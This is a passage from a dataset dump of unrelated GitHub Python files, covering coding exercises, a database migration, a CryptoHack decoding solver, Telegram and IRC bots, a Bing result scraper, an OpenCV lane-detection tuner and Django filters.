[#&!+]?['+RE+']+ :.*$',re.IGNORECASE).search\n\nwhile 1:\n buff = os.read(6,2+12+4+8)\n if len(buff) < 2+12+4+8: break\n while len(buff[2+12+4+8:]) != ord(buff[0])*256 + ord(buff[1]):\n b = os.read(6,ord(buff[0])*256 + ord(buff[1]) - len(buff[2+12+4+8:]))\n if not b: sys.exit(0)\n buff += b\n buff = buff[2+12+4+8:]\n\n if re_PRIVMSG(buff):\n src = buff[1:].split('!',1)[0]\n dst = buff.split(' 
',3)[2]\n msg = buff.split(' :',1)[1]\n if msg.lower()[:5] == '!ping':\n buff = liburc.urchub_fmt(':bot!bot@bot PRIVMSG '+dst+' :pong\\n')\n os.write(7,buff)\n","repo_name":"JosephSWilliams/urcd","sub_path":"contrib/jsw/urcbot/urcbot.py","file_name":"urcbot.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"31"} +{"seq_id":"14258942766","text":"\"\"\"empty message\n\nRevision ID: a59a50101e2b\nRevises: 329560231692\nCreate Date: 2023-10-29 04:26:57.794240\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import mysql\n\n# revision identifiers, used by Alembic.\nrevision = 'a59a50101e2b'\ndown_revision = '329560231692'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('board', schema=None) as batch_op:\n batch_op.alter_column('member_name',\n existing_type=mysql.VARCHAR(length=10),\n type_=sa.Integer(),\n existing_nullable=True)\n batch_op.create_foreign_key(None, 'users', ['member_name'], ['member_name'])\n\n with op.batch_alter_table('comment', schema=None) as batch_op:\n batch_op.add_column(sa.Column('member_name', sa.Integer(), nullable=True))\n batch_op.create_foreign_key(None, 'users', ['member_name'], ['member_name'])\n\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n with op.batch_alter_table('comment', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='foreignkey')\n batch_op.drop_column('member_name')\n\n with op.batch_alter_table('board', schema=None) as batch_op:\n batch_op.drop_constraint(None, type_='foreignkey')\n batch_op.alter_column('member_name',\n existing_type=sa.Integer(),\n type_=mysql.VARCHAR(length=10),\n existing_nullable=True)\n\n # ### end Alembic commands ###\n","repo_name":"silver-gyo/p4c","sub_path":"migrations/versions/a59a50101e2b_.py","file_name":"a59a50101e2b_.py","file_ext":"py","file_size_in_byte":1603,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"41461774897","text":"\"\"\"\nGiven the root of a binary tree, invert the\ntree, and return its root.\n\nExample 1:\n\n\nInput: root = [4,2,7,1,3,6,9]\nOutput: [4,7,2,9,6,3,1]\n\nExample 2:\n\nInput: root = [2,1,3]\nOutput: [2,3,1]\n\nExample 3:\n\nInput: root = []\nOutput: []\n \nConstraints:\n\nThe number of nodes in the tree is \nin the range [0, 100].\n\n-100 <= Node.val <= 100\n\nTakeaway:\n\nWe can approach the problem with recursion\n\nSimply make the swap and call the method on to the children Node\n\nDepth-First Search (DFS) in the context of a binary tree. DFS is\n a common algorithm used for traversing or searching tree and \ngraph data structures. 
In this specific case, it's a pre-order\nDFS because it visits the current node, then recursively explores\nits left and right subtrees.\n\n\"\"\"\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass Solution:\n \n # my first try\n # the approach was somewhat correct\n def invert_tree(self, root):\n # how do we invert a tree?\n # if it has a child, we should be switching its children.\n # if it's a leaf, don't do anything\n \n current = root\n if current.left == None and current.right == None:\n return \n while current.left != None and current.right != None:\n temp = current.left\n current.left = current.right\n current.right = temp \n\n return current\n\n def invertTree(self, root):\n if root is None:\n return None\n\n # Swap the left and right subtrees\n root.left, root.right = root.right, root.left\n\n # Recursively invert the left and right subtrees\n self.invertTree(root.left)\n self.invertTree(root.right)\n\n return root","repo_name":"kantarcise/notebook","sub_path":"neetcode/046.invert_binary_tree.py","file_name":"046.invert_binary_tree.py","file_ext":"py","file_size_in_byte":1832,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"3204385251","text":"one = 1\nhundred = 100\nattempts = 0\n\nfile = open('results.txt', 'a', encoding='UTF-8')\n\n\nwhile True:\n a = 0\n current = (one + hundred)//2\n number = input('Is your number {}? '.format(current))\n if number.lower() == 'yes':\n attempts += 1\n file.write(f'{current} {number}\\n')\n a = current\n file.write(f'Attempts: {attempts} Guessed number: {a}\\n')\n print('I guessed the number')\n break\n elif number == '>':\n attempts += 1\n file.write(f'{current} {number}\\n')\n one = current + 1\n elif number == '<':\n attempts += 1\n file.write(f'{current} {number}\\n')\n hundred = current - 1\n else:\n print('Enter only <, > and \"yes\"')\n\n\n\n\n\n\n\n\n\n","repo_name":"karumzun/my_hw","sub_path":"Alan_21-2_hw8.py","file_name":"Alan_21-2_hw8.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"38119046401","text":"import os\nfrom helper_functions import *\n\nclass EdgeFinder:\n def __init__(self, image, threshold1=0, threshold2=0, rho=0, theta=0, \\\n hough_threshold=0, min_line_len=0, max_line_gap=0, kernel_size=1, \\\n x_offset=0, y_offset=0):\n self.image = image\n self._threshold1 = threshold1\n self._threshold2 = threshold2\n self._rho = rho\n self._theta = theta\n self._hough_threshold = hough_threshold\n self._min_line_len = min_line_len\n self._max_line_gap = max_line_gap\n self._kernel_size = kernel_size\n self._roi_x_offset = x_offset\n self._roi_y_offset = y_offset\n\n self.create_window()\n\n def create_window(self):\n\n def onchangeThreshold1(pos):\n self._threshold1 = pos\n self._render()\n\n def onchangeThreshold2(pos):\n self._threshold2 = pos\n self._render()\n \n def onchangeRho(pos):\n self._rho = pos\n self._render()\n \n def onchangeTheta(pos):\n self._theta = pos\n self._render()\n \n def onchangeHoughThreshold(pos):\n self._hough_threshold = pos\n self._render()\n \n def onchangeMinLineLen(pos):\n self._min_line_len = pos\n self._render()\n \n def onchangeMaxLineLen(pos):\n self._max_line_gap = pos\n self._render()\n \n def onchangeKernelSize(pos):\n self._kernel_size = pos\n self._kernel_size += (self._kernel_size + 1) % 2 # make sure the 
filter size is odd\n self._render()\n\n def onchangeROIX(pos):\n self._roi_x_offset = pos\n self._render()\n \n def onchangeROIY(pos):\n self._roi_y_offset = pos\n self._render()\n\n cv2.namedWindow(\"edges\")\n\n cv2.createTrackbar('threshold1', 'edges', self._threshold1, 500, onchangeThreshold1)\n cv2.createTrackbar('threshold2', 'edges', self._threshold2, 500, onchangeThreshold2)\n cv2.createTrackbar('rho', 'edges', self._rho, 20, onchangeRho)\n cv2.createTrackbar('theta', 'edges', self._theta, 45, onchangeTheta)\n cv2.createTrackbar('hough_threshold', 'edges', self._hough_threshold, 100, onchangeHoughThreshold)\n cv2.createTrackbar('min_line_len', 'edges', self._min_line_len, 100, onchangeMinLineLen)\n cv2.createTrackbar('max_line_gap', 'edges', self._max_line_gap, 100, onchangeMaxLineLen)\n cv2.createTrackbar('kernel_size', 'edges', self._kernel_size, 21, onchangeKernelSize)\n cv2.createTrackbar('roi_x_offset', 'edges', self._roi_x_offset, 100, onchangeROIX)\n cv2.createTrackbar('roi_y_offset', 'edges', self._roi_y_offset, 100, onchangeROIY)\n self._render()\n\n cv2.waitKey(0)\n cv2.destroyWindow(\"edges\")\n\n\n def set_image(self, image):\n self.image = image\n self._render()\n\n def edgeImage(self):\n return self._edge_img\n\n def smoothedImage(self):\n return self._smoothed_img\n\n def _render(self):\n \n ysize, xsize = self.image.shape[0], self.image.shape[1]\n gray_img = grayscale(self.image)\n gauss_img = gaussian_blur(gray_img, self._kernel_size)\n canny_img = canny(gauss_img, self._threshold1, self._threshold2)\n vertices = np.array([[(xsize//2+self._roi_x_offset, ysize//2+self._roi_y_offset), \\\n (xsize//2-self._roi_x_offset, ysize//2+self._roi_y_offset), \\\n (0, ysize), (xsize, ysize)]], dtype=np.int32)\n canny_img = region_of_interest(canny_img, vertices)\n line_img = hough_lines(canny_img, self._rho, self._theta*np.pi/180, self._hough_threshold, \\\n self._min_line_len, self._max_line_gap)\n\n cv2.polylines(line_img, [vertices], True, (0, 0, 255), 2)\n\n \n final_img = cv2.cvtColor(weighted_img(line_img, initial_img), cv2.COLOR_RGB2BGR)\n \n\n cv2.imshow('edges', final_img)\n print(self._threshold1, self._threshold2, self._rho, self._theta, self._hough_threshold, \\\n self._min_line_len, self._max_line_gap, self._kernel_size, \\\n self._roi_x_offset, self._roi_y_offset)\n\n\nif __name__ == '__main__':\n edge_finder = None\n for ff in os.listdir(\"test_images/\"):\n print(ff)\n initial_img = mpimg.imread(\"test_images/\" + ff)\n if not edge_finder:\n edge_finder = EdgeFinder(initial_img, threshold1=100, threshold2=250, rho=1, theta=2, \\\n hough_threshold=25, min_line_len=20, max_line_gap=40, kernel_size=7, \\\n x_offset=20, y_offset=0)\n else:\n edge_finder.set_image(initial_img)\n edge_finder.create_window()\n \n","repo_name":"kaulshiv/CarND-LaneLines-P1","sub_path":"parameter_tuning.py","file_name":"parameter_tuning.py","file_ext":"py","file_size_in_byte":4867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"19396988113","text":"from pwn import * # pip install pwntools\nimport json\nfrom Crypto.Util.number import bytes_to_long, long_to_bytes\nimport base64\nimport codecs\nimport random\nfrom binascii import unhexlify\n\n\nr = remote('socket.cryptohack.org', 13377, level = 'debug')\n\ndef json_recv():\n line = r.recvline()\n return json.loads(line.decode())\n\ndef json_send(hsh):\n request = json.dumps(hsh).encode()\n r.sendline(request)\n\ndef list_to_string(s):\n output = \"\"\n 
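# join the decoded characters back into a single string\n 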
return(output.join(s))\n\n\n# the challenge statement says we have 100 levels to pass, so we need to decode 100 messages\nfor i in range(0,101):\n received = json_recv()\n # FLAG = \"crypto{????????????????????}\"\n # the answer we want is written as \"FLAG\": crypto{\n if \"flag\" in received:\n print(f\"\\n[*] FLAG: {received['flag']}\")\n break\n\n print(f\"\\n[-] Cycle: {i}\")\n print(f\"[-] Received type: {received['type']}\")\n print(f\"[-] Received encoded value: {received['encoded']}\")\n\n palavra_codificada = received[\"encoded\"]\n encoding = received[\"type\"]\n\n\n \"\"\"\n ENCODINGS = [\n \"base64\",\n \"hex\",\n \"rot13\",\n \"bigint\",\n \"utf-8\",\n ]\n \"\"\"\n # {\"type\": \"bigint\", \"encoded\": \"0x77726974696e675f646570656e64735f6c6974\"}\n # for each encoding returned, apply the decode step matching that encoding\n if encoding == \"base64\":\n decoded = base64.b64decode(palavra_codificada).decode('utf8')\n elif encoding == \"hex\":\n decoded = (unhexlify(palavra_codificada)).decode('utf8') \n elif encoding == \"rot13\":\n decoded = codecs.decode(palavra_codificada, 'rot_13')\n elif encoding == \"bigint\":\n decoded = unhexlify(palavra_codificada.replace(\"0x\", \"\")).decode('utf8')\n elif encoding == \"utf-8\":\n decoded = list_to_string([chr(b) for b in palavra_codificada])\n\n print(f\"[-] Decoded: {decoded}\")\n print(f\"[-] Decoded Type: {decoded}\")\n\n to_send = {\n \"decoded\": decoded\n }\n\n # send the decoded answer back\n json_send(to_send)\n\n\n","repo_name":"jhaysonj/GRIS-PS-2022","sub_path":"criptografia/encoding_challenge.py","file_name":"encoding_challenge.py","file_ext":"py","file_size_in_byte":2053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33973665105","text":"'''\r\n1 - List the characters sorted by height\r\n2 - Show the tallest character of each gender\r\n3 - Sort the characters by weight\r\n4 - Build a character search tool \r\n5 - Export the character list to CSV\r\n6 - Exit\r\n'''\r\nimport funciones\r\n\r\ndef starwars_app():\r\n lista_personajes = funciones.cargar_json(\"data.json\")\r\n \r\n while(True):\r\n print(\"1 - List the characters sorted by height\\n2 - Show the tallest character of each gender\\n3 - Sort the characters by weight\\n4 - Build a character search tool\\n5 - Export the character list to CSV\\n6 - Exit\\n\")\r\n respuesta = input()\r\n if(respuesta==\"1\"):\r\n funciones.imprimir_personajes(lista_personajes, 'height')\r\n elif(respuesta==\"2\"):\r\n genero = input('Enter the character gender: (male, n/a, female)\\n> ')\r\n if genero != 'male' and genero != 'n/a' and genero != 'female':\r\n genero = input('Enter the character gender: (male, n/a, female)\\n> ')\r\n personaje = funciones.buscar_personaje_mas_alto_genero(lista_personajes, genero)\r\n personaje = '\\nName: {0}\\nHeight: {1}\\nMass: {2}\\nGender: {3}\\n'.format(personaje['name'], personaje['height'] ,personaje['mass'], personaje['gender'])\r\n print(personaje)\r\n elif(respuesta==\"3\"):\r\n funciones.imprimir_personajes(lista_personajes, 'mass')\r\n elif(respuesta==\"4\"):\r\n personaje = input('Enter the name of the character to search for: \\n> ')\r\n funciones.buscar_personaje(lista_personajes, personaje)\r\n elif(respuesta==\"5\"):\r\n print(\"5 - Export the character list to CSV\\n\")\r\n elif(respuesta==\"6\"):\r\n 
break\r\n\r\n\r\nstarwars_app()\r\n\r\n","repo_name":"gabrielhnunez39166/Programacion-y-Laboratorio-I---1H","sub_path":"PP_STARWARS/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"24985134844","text":"'url handlers'\r\n\r\nimport re, time, json, logging, hashlib, base64, asyncio\r\nfrom coroweb import get, post\r\nfrom models import User, Comment, Blog, next_id\r\n# handler function for the home page URL:\r\n# @get('/')\r\n# async def index(request):\r\n# \tusers = await User.findAll()\r\n# \treturn {\r\n# \t\t'__template__' : 'test.html',\r\n# \t\t'users' : users\r\n# \t}\r\n\r\n@get('/')\r\nasync def index(request):\r\n\tsummary = 'Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.'\r\n\tblogs = [\r\n\t\tBlog(id = '1', name = 'Test Blog', summary = summary, created_at = time.time()-120),\r\n\t\tBlog(id = '2', name = 'Something New', summary = summary, created_at = time.time()-3600),\r\n\t\tBlog(id = '3', name ='Learn Swift', summary = summary, created_at = time.time()-7200)\r\n\t]\r\n\r\n\treturn { '__template__' : 'blogs.html', 'blogs' : blogs}","repo_name":"chen358805035/python","sub_path":"day8/awesome-python3-webapp/www/handlers.py","file_name":"handlers.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"71634399768","text":"'''\nSquare Root of Integer\nProblem Description\n\nGiven an integer A.\n\nCompute and return the square root of A.\n\nIf A is not a perfect square, return floor(sqrt(A)).\n\nDO NOT USE SQRT FUNCTION FROM STANDARD LIBRARY.\n\nNOTE: Do not use sort function from standard library. Users are expected to solve this in O(log(A)) time.\n\n\n\nProblem Constraints\n0 <= A <= 10^10\n\n\n\nInput Format\nThe first and only argument given is the integer A.\n\n\n\nOutput Format\nReturn floor(sqrt(A))\n\n\n\nExample Input\nInput 1:\n\n 11\nInput 2:\n\n 9\n\n\nExample Output\nOutput 1:\n\n 3\nOutput 2:\n\n 3\n\n\nExample Explanation\nExplanation:\n\n When A = 11 , square root of A = 3.316. 
It is not a perfect square so we return the floor which is 3.\n When A = 9 which is a perfect square of 3, so we return 3.\n\n\n\n APPROACH:\n here trick is that we know that sqrt of A can lie between 1 to A//2\n idea is to apply binary search for possible sqrts and manipulate on basis of sqrt * sqrt\n but this would only work for perfect sqrts how we deal with not perfect squares ???\n\n notice here we will specify if mid * mid == A then return mid\n\n here thing to notice is that if lets say A = 9 and A = 11\n so for both floor(sqrt) would be 3\n\n so lets say if mid * mid < A then we can store it as possible answer and try to get bigger hence start would be mid + 1\n\n'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\nimport sys\ndef sqrt( A):\n if (A == 0 or A == 1) :\n return A \n start = 1\n end = A//2\n ans = sys.maxsize\n while start <= end:\n mid = (start + end)//2\n \n if mid * mid > A:\n end = mid -1\n elif mid * mid <= A:\n ans = mid\n start = mid + 1\n return ans \n\n\nprint(sqrt(8))","repo_name":"GammaWind/dsa","sub_path":"binary search/squareRootfloor.py","file_name":"squareRootfloor.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"35220313157","text":"\r\nfor i in range(int(input())):\r\n l1,l2,s1,p=[],[],{},0\r\n for j in range(int(input())):\r\n s=[int(k) for k in input().split(' ')]\r\n for l in range(len(s)):\r\n if p==0:\r\n s1[l]=s[l]\r\n else:\r\n s1[l]+=s[l] \r\n p+=1\r\n l1.append(sum(s))\r\n l2,f=[g for g in s1.values()],0\r\n for h in l1:\r\n if h not in l2:\r\n print('Impossible')\r\n f=1\r\n break\r\n if f==0: print('Possible')\r\n\r\n \r\n\r\n\r\n","repo_name":"meena-shiv/Hackerrank-solutions","sub_path":"orgnise containers ball.py","file_name":"orgnise containers ball.py","file_ext":"py","file_size_in_byte":518,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3547863197","text":"from xml.etree import ElementTree\nfrom urllib.parse import quote\nfrom selenium import webdriver\nimport requests\nimport json\nimport pymongo\nfrom multiprocessing import Pool\n\nclient = pymongo.MongoClient()\ndb = client.bing\ntasks = db.tasks\n\n\ndef bing_search(session, query):\n while True:\n try:\n response = session.get(\"http://cn.bing.com/search?format=rss&ensearch=1&FORM=QBLH&q=%s\" % quote(query), headers={\n \"User-Agent\": \"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36\",\n # \"Cookie\": \"DUP=Q=cyf2E319RplzT70uHnlIqw2&T=368615744&A=2&IG=FC18BC5497064931959EE9F6DA0B10D2; MUID=1AE2679CCD1F6E4533796B00C91F6D54; SRCHD=AF=NOFORM; MSCC=1; MUIDB=1AE2679CCD1F6E4533796B00C91F6D54; _EDGE_S=mkt=zh-cn&SID=24BE194AE40368593F351431E55B692C; _FP=hta=on; SerpPWA=reg=1; ULC=P=F0B3|1:1&H=F0B3|1:1&T=F0B3|1:1; SRCHHPGUSR=CW=1280&CH=689&DPR=2&UTC=480&WTS=63696304825; ipv6=hit=1560711627371&t=4; SRCHUSR=DOB=20190614&T=1560708028000; ENSEARCH=BENVER=0; _SS=SID=24BE194AE40368593F351431E55B692C&bIm=525816&HV=1560708033; SRCHUID=V=2&GUID=E36C49C8C20D43F6804EC01055B2921D&dmnchg=1; SNRHOP=I=&TS=\",\n }, timeout=5)\n # print(response.content)\n body = response.content\n tree = ElementTree.fromstring(response.content)\n # tree = ElementTree.fromstring(driver.page_source)\n x = tree.find('item')\n texts = []\n for it in tree.find('channel').findall('item'):\n texts.append(it.find('description').text)\n break\n except:\n pass\n return texts, body\n\n\ndef get_new_session():\n 
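# launch a headless Chrome once to harvest Bing cookies, then copy them into a plain requests session\n 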
print(\"get new session\")\n options = webdriver.ChromeOptions()\n options.add_argument('--disable-extensions')\n options.add_argument('--headless')\n driver = webdriver.Chrome(chrome_options=options)\n\n session = requests.session()\n driver.get(\"https://cn.bing.com/search?q=hellp&qs=n&form=QBLH&sp=-1&pq=&sc=0-0&sk=&cvid=36D87CF616344F2EB887E777C3E0BB2F\")\n print(driver.get_cookies())\n for cookie in driver.get_cookies():\n session.cookies.set(cookie[\"name\"], cookie[\"value\"], domain=cookie[\"domain\"], path=cookie[\"path\"])\n\n driver.quit()\n return session\n\ncount = 0\nsession = get_new_session()\n\n\ndef crawl_one(task, count):\n texts, body = bing_search(session, task[\"query\"])\n\n failed_time = 0\n while len(texts) == 0:\n print(\"zero length\")\n texts, body = bing_search(session, task[\"query\"])\n failed_time += 1\n if failed_time > 4:\n break\n print(task)\n print(count, task[\"query\"], len(texts))\n tasks.update({'_id': task[\"_id\"]}, {\n '$set': {\n \"is_crawled\": True,\n \"body\": body,\n \"answer_count\": len(texts)\n },\n })\n\npool = Pool(10)\n\nfor task in tasks.find({\"is_crawled\": False}):\n pool.apply_async(crawl_one, args=(task, count))\n # crawl_one(task, count)\n count += 1\n\npool.close()\npool.join()\n","repo_name":"nladuo/bing_search_crawler","sub_path":"bing_crawler.py","file_name":"bing_crawler.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"12342885445","text":"#%%\nimport pandas as pd\ntranslate_dict = {\"Scientific Publications\":\"論文\",\n \"Corresponding Author\":\"責任著者\",\n \"First Author\":\"筆頭著者\",\n \"Last Author\":\"最終著者\",\n \"Patents\":\"知財・特許\"} \ndef format_title(title):\n return title.replace(\";\",\",\")\n\ndef format_date(date,n=8): # change format if n < 8\n date = str(date)\n formatted_date = date[:4]+\"/\"+date[4:6]+\"/\"+date[6:8]\n formatted_date = formatted_date.replace(\"X\",\"\")\n return formatted_date\n\n\ndef format_authors(authors):\n sorted_authors = \"\"\n for a in authors.split(\" and \"):\n try:\n last,first = a.split(\", \")\n sorted_authors += first + \" \" + last + \", \"\n except ValueError:\n sorted_authors += a + \", \"\n sorted_authors = sorted_authors[:-2] \n return sorted_authors\n\ndef translate(txt):\n for k,v in translate_dict.items():\n txt = txt.replace(k,v)\n return txt \n\nfor LANG in [\"\",\"_JP\"]:\n #### Main Articles #####\n df = pd.read_csv(f\"../achievements/Publications.csv\", index_col = 0) # {LANG}\n df = df.sort_values(by = [\"type\",\"year\"], ascending = [True, False]).fillna(\"\")\n N = df.shape[0]\n num_original = df[df[\"type\"]==\"original\"].shape[0]\n num_corresponding = df[\"author\"].str.contains(\"Ooka*\").sum() \n num_first = df[\"ID\"].str.contains(\"Ooka\").sum()\n out_html = f\"(Corresponding Author: {num_corresponding}, First Author: {num_first})
    \\n\\n\"\n\n out_html += f\"\\n\\t

    Original Articles

      \\n\"\n year_header = \"2030\"\n\n for i in range(N):\n data = df.iloc[i].astype(str)\n ID, authors, journal, year, volume, pages, doi, notes, ENTRYTYPE, type, title, fullame, abbrv, status = data\n if year < year_header:\n year_header = year\n out_html += \"\\t

      {}

      \\n\".format(year_header)\n authors = format_authors(authors)\n if pages == \"\": # must be not accepted yet\n volume = status\n pages = doi\n \n out_html += f\"\\t\\t
    1. {authors} \\\"{title}\\\", {journal}, {year}, {volume}, {pages}.
      \\n\\n\"\n if i == num_original-1:\n out_html += \"\\t
    \\n\\n\"\n out_html += f\"

    Review Articles

      \\n\"\n out_html += \"\\t
    \\n\\n\"\n\n #### Other Articles (Non Peer Reviewed) #####\n out_html += f\"

    Other Articles (Non Peer Reviewed)

      \\n\"\n df = pd.read_csv(f\"../achievements/Non_Peer_Reviewed{LANG}.csv\")\n df = df.sort_values(by = [\"Date\"], ascending = [False]).fillna(\"\")\n N = df.shape[0]\n for i in range(N):\n data = df.iloc[i].astype(str)\n title, authors, journal, year, volume, pages, URL, type, date, doi, notes = data\n title = format_title(title)\n authors = format_authors(authors)\n if pages != \"\": # it has \"proper\" bibliography information:\n out_html += f\"\\t\\t
    1. {authors} \\\"{title}\\\", {journal}, {year}, {volume}, {pages}.
      \\n\\n\"\n if pages == \"\": # it must have a URL\n out_html += f\"\\t\\t
    2. {authors} \\\"{title}\\\", {journal} (URL).
      \\n\\n\"\n out_html += \"\\t
    \\n\\n\"\n\n\n\n out_html = out_html.replace(\"MoS$_2$\", \"MoS2\").replace(\"CO$_2$\", \"CO2\").replace(\"{\\`e}\",\"è\").replace(\"MnO$_2$\", \"MnO2\")\n if LANG == \"_JP\":\n out_html = translate(out_html)\n\n with open(f\"../contents/publications{LANG}_contents.html\", \"w\", encoding=\"utf-8\") as f:\n f.write(out_html)\n","repo_name":"HideshiOoka/Homepage","sub_path":"python/make_publications_contents.py","file_name":"make_publications_contents.py","file_ext":"py","file_size_in_byte":3562,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"30919422884","text":"import dotenv\ndotenv.load_dotenv()\nimport os\nfrom logger import LOG\n\nfrom telegram.ext import Updater, InlineQueryHandler, CommandHandler, MessageHandler\nfrom telegram.ext.filters import Filters\nimport requests\n\n\nMY_CHAT_ID = int(os.getenv('MY_CHAT_ID', 0))\nTELEGRAM_BOT_ID = os.getenv('TELEGRAM_BOT_ID', '')\n\nGET_IP_URL = 'https://api.ipify.org'\nADMINS = [MY_CHAT_ID]\n\ndef ip(bot, update):\n chat_id = update.message.chat_id\n LOG.info(\"ip request: %s\", chat_id)\n if chat_id in ADMINS:\n # bot.send_photo(chat_id=chat_id, photo=url)\n try:\n ip = requests.get(GET_IP_URL).text\n bot.send_message(chat_id=chat_id, text=ip)\n except Exception as e:\n LOG.error(e)\n \ndef msg_handler(bot, update):\n chat_id = update.message.chat_id\n message = update.message.text\n\n LOG.info('message from %s: \"%s\"', chat_id, message)\n\n if chat_id in ADMINS:\n bot.send_message(chat_id=chat_id, text=message)\n else:\n bot.send_message(chat_id=chat_id, text='Вас нет в списке приглашенных.')\n \n\ndef main():\n updater = Updater(TELEGRAM_BOT_ID)\n dp = updater.dispatcher\n dp.bot.send_message(chat_id=MY_CHAT_ID, text='Я запустился!')\n dp.add_handler(CommandHandler('ip', ip))\n dp.add_handler(MessageHandler(Filters.all, msg_handler))\n updater.start_polling()\n updater.idle()\n\nif __name__ == '__main__':\n main()","repo_name":"Sanek1710/tgbot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1430,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71660677207","text":"import tensorflow as tf\nimport numpy as np\nfrom keras.datasets import mnist\nfrom keras.utils import to_categorical\n\n(train_images, train_labels), (test_images, test_labels) = mnist.load_data()\n\nflattenDim = 28 * 28\nTRAINING_SIZE = len(train_images)\nTEST_SIZE = len(test_images)\n\ntrainImages = np.reshape(train_images, (TRAINING_SIZE, flattenDim))\ntestImages = np.reshape(test_images, (TEST_SIZE, flattenDim))\nprint(type(trainImages[0][0]))\ntrainImages = trainImages.astype(np.float32)\ntestImages = testImages.astype(np.float32)\nprint(type(trainImages[0][0]))\ntrainImages /= 255\ntestImages /= 255\nNUM_DIGITS = 10\ntrainLabels = to_categorical(train_labels, NUM_DIGITS)\ntestLabels = to_categorical(test_labels, NUM_DIGITS)\nprint(trainImages[0])\nprint(trainLabels[0])","repo_name":"jsw7524/pykt0803","sub_path":"Demo69.py","file_name":"Demo69.py","file_ext":"py","file_size_in_byte":763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"72265436569","text":"# -*- coding: utf-8 -*-\n\nfrom django.utils.translation import ugettext_lazy as _\nfrom django import forms\n\nfrom collections import defaultdict\n\nfrom groups.models import Group\nfrom courses.models import Course\nfrom users.models import UserProfile\nfrom users.model_user_status import 
UserStatus\n\nimport django_filters\nimport logging\n\nlogger = logging.getLogger('django.request')\n\n\nclass CustomMethodFilter(django_filters.Filter):\n def __init__(self, *args, **kwargs):\n self.field_class = kwargs.pop('field_class', forms.Field)\n\n super(CustomMethodFilter, self).__init__(*args, **kwargs)\n\n\nclass UserProfileFilter(django_filters.FilterSet):\n courses = CustomMethodFilter(label=_(u'kurs'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n groups = CustomMethodFilter(label=_(u'gruppa'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n user_status_activity = CustomMethodFilter(label=_(u'status_studenta'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n user_status_filial = CustomMethodFilter(label=_(u'filial'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n user_status_admission = CustomMethodFilter(label=_(u'status_postupleniya'),\n method='empty_filter',\n widget=forms.SelectMultiple,\n field_class=forms.MultipleChoiceField)\n\n STATUS_SQL_JOIN = 'LEFT OUTER JOIN users_userprofile_user_status {0} ' \\\n 'ON (users_userprofile.id = {0}.userprofile_id)'\n STATUS_SQL_PREFIX = 'UUUS'\n STATUS_SQL_EXTRA = '''\n users_userprofile.id IN (\n SELECT DISTINCT\n users_userprofile.id\n FROM users_userprofile\n {0}\n WHERE {1}\n )\n '''\n\n def empty_filter(self, qs, value):\n return qs\n\n # def filter_course(self, qs, value):\n # if not hasattr(self, '_qs'):\n # if value and qs:\n # return qs.filter(user__group__course__id__in=value).distinct()\n # return qs\n #\n # def filter_group(self, qs, value):\n # if not hasattr(self, '_qs'):\n # if value and qs:\n # return qs.filter(user__group__id__in=value).distinct()\n # return qs\n\n def set(self):\n for field in self.filters:\n self.filters[field].field.label = u'{0}'.format(self.filters[field].field.label)\n\n self.courses_qs = Course.objects.filter(is_active=True)\n courses_choices = [(course.id, course.name) for course in self.courses_qs]\n self.filters['courses'].field.choices = tuple(courses_choices)\n\n self.groups_qs = Group.objects.all()\n groups = [(group.id, group.name) for group in self.groups_qs]\n self.filters['groups'].field.choices = tuple(groups)\n\n activity_choices = []\n filial_choices = []\n admission_choices = []\n for status in UserStatus.objects.exclude(type__isnull=True):\n if status.type == 'activity':\n activity_choices.append((status.id, status.name))\n elif status.type == 'filial':\n filial_choices.append((status.id, status.name))\n elif status.type == 'admission':\n admission_choices.append((status.id, status.name))\n\n self.filters['user_status_activity'].field.choices = tuple(activity_choices)\n self.filters['user_status_filial'].field.choices = tuple(filial_choices)\n self.filters['user_status_admission'].field.choices = 